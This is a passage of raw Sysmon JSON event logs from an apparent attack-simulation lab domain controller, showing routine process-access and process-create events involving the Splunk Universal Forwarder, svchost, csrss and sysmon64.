C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.413","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10EE-5F25-0000-001047420500}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:26.554\r\nSourceProcessGUID: {E2A3D6B1-10EE-5F25-0000-001047420500}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4540\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:26.554","SourceProcessGUID":"{E2A3D6B1-10EE-5F25-0000-001047420500}","SourceProcessId":"4536","SourceThreadId":"4540","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.290\r\nProcessGuid: {E2A3D6B1-10EF-5F25-0000-00100A440500}\r\nProcessId: 4556\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.290","ProcessGuid":"{E2A3D6B1-10EF-5F25-0000-00100A440500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10EF-5F25-0000-00100A440500}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10EF-5F25-0000-00100A440500}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10EF-5F25-0000-00100A440500}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10EF-5F25-0000-00100A440500}","TargetProcessId":"4556","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.289","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.289\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 